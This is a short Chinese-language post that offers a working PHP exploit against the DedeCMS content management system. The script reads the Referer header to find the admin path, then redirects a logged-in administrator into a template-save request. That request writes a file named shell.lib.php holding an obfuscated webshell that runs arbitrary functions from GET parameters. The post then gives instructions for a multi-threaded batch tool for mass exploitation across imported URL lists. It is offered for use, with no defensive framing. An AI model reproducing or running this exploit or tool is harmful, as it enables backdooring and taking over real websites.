不多说一类多说的吧直接上exp

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php，取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

当然也有大牛研究出来了工具

使用说明

1、左侧右键导入网址
2、中间右键点击配置可打开右侧功能区
3、修改key.ini文件里面的www.xxx.com/dede.php 替换成自己的即可
4、扫描完毕之后点击开始获取即可获取验证码，点击手工插入即可进行插入功能，下次会自动获取验证码，直接输入
验证码，进行手工插入即可。
4、多线程批量扫描，可自定义线程，可以导入大量url工作。